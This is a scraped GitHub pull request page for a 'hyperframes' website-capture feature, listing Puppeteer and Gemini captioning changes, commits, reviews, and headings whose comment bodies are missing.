networkidle2 instead of networkidle0 — SPAs with persistent WebSocket connections (like vibecodeapp.com) were timing out, not blocked. networkidle2 allows 2 ongoing connections and is the Puppeteer-recommended default for modern sites
Lazy-load image wait — after scrolling, waits for all img.complete before proceeding (Framer IntersectionObserver support)
CSS background-image cataloging — scans getComputedStyle(el).backgroundImage on divs for Framer/Webflow sites
SVG naming — checks class, id, parent class, inner <text> before falling back to icon-N.svg. NeetCode roadmap is now ngx-graph.svg, FontAwesome icons are fa-twitter.svg, fa-youtube.svg
Gemini batching — batch 5→20, pause 12s→2s (paid tier handles 2000 RPM). 78-image site now captions in ~10s instead of 3 min
maxOutputTokens 300→500 — descriptions were being truncated mid-sentence
Asset descriptions sorted — Gemini-captioned images listed first (richest descriptions), then uncaptioned, then SVGs, then fonts
Removed tsx fallback from step-1 per @jrusso1020's nit

Tested on neetcode.io (26 images cataloged, SVGs named correctly), heykuba.com (2→78 images), vibecodeapp.com (was timing out, now captures in ~15s).

ukimsanov and others added 29 commits April 15, 2026 14:04

refactor(cli): simplify capture pipeline, remove replica generator

5ac5ca9

refactor(capture): remove AI auto-generation and SDK dependencies

3b07dc2

fix(capture): convert extracted colors to HEX format

b6c8ec0

refactor(capture): remove AI key path, add asset descriptions generator

98967be

refactor(capture): update agent prompt, remove hasDesignMd, add asset…

4c0e131

… descriptions

feat(capture): pre-wire shader transitions in index.html scaffold

2abeafc

chore: remove duplicate visual-styles.md (canonical is in hyperframes/)

26f47b5

refactor(skill): rewrite website-to-hyperframes as phase-based orches…

5ad7eae

…trator

feat(skill): add Phase 1 understand reference

b74bcaa

feat(skill): add Phase 2 design reference with full DESIGN.md schema

78589d4

feat(skill): add Phase 3 creative direction reference

67c96d8

feat(skill): add Phase 4 build reference with inline shader example

56b0b5d

feat(skill): upgrade Visual Identity Gate to produce full DESIGN.md

179f1e3

docs: update CLAUDE.md skill references for phase-based workflow

0795530

fix(cli): add capture command to help groups

4e5d8d1

The capture command was registered in cli.ts but missing from the help groups, so it wouldn't appear in `hyperframes --help`. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

style: format skill reference files (oxfmt)

fff79b7

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

ularkim requested a review from jrusso1020 April 15, 2026 18:20

vanceingalls reviewed Apr 15, 2026

View reviewed changes

ularkim requested review from jrusso1020 and vanceingalls April 16, 2026 01:44

vanceingalls approved these changes Apr 16, 2026

View reviewed changes

jrusso1020 reviewed Apr 16, 2026

View reviewed changes

miguel-heygen reviewed Apr 16, 2026

View reviewed changes

ukimsanov added 4 commits April 15, 2026 23:19

miguel-heygen approved these changes Apr 16, 2026

View reviewed changes

ularkim requested review from jrusso1020, miguel-heygen and vanceingalls April 16, 2026 13:42

jrusso1020 approved these changes Apr 16, 2026

View reviewed changes

jrusso1020 merged commit 87f4c77 into main Apr 16, 2026
20 checks passed

jrusso1020 deleted the feat/website-capture-design-md branch April 16, 2026 19:03

		- Kokoro (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.

		Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?

Conversation

ularkim commented Apr 15, 2026

What

Why

How

Test plan

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

ularkim commented Apr 16, 2026

Review Response

Fixed ✅

Deferred to follow-up PR

Additional improvements in this commit

Uh oh!

vanceingalls left a comment

Choose a reason for hiding this comment

Uh oh!

jrusso1020 left a comment

Choose a reason for hiding this comment

Staff-Engineer Second Pass Review

Still Open — Must Fix Before Merge

Should Fix

Nits

Verdict

Uh oh!

miguel-heygen left a comment

Choose a reason for hiding this comment

Must fix before merge

Should fix

Smaller items (not blocking)

Verification of fixes from commit 6266708

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

ularkim commented Apr 16, 2026

Review Response — Round 3

Security fixes (48ec6a0, 44b9cbd)

Modularity (3b2e1cb)

Cleanup (be0f194)

Other (0f3c88d, 44b9cbd)

Re: adm-zip (#3 from round 1)

Re: ANTHROPIC_API_KEY (#6 from round 2)

Uh oh!

jrusso1020 left a comment

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

ularkim commented Apr 16, 2026

Latest push (8af3814) — Capture quality fixes

Changes

Uh oh!

Uh oh!

Reviewers

Assignees

Verification of fixes from commit `6266708`

Security fixes (`48ec6a0`, `44b9cbd`)

Modularity (`3b2e1cb`)

Cleanup (`be0f194`)

Other (`0f3c88d`, `44b9cbd`)

Re: `adm-zip` (#3 from round 1)

Re: `ANTHROPIC_API_KEY` (#6 from round 2)

Latest push (`8af3814`) — Capture quality fixes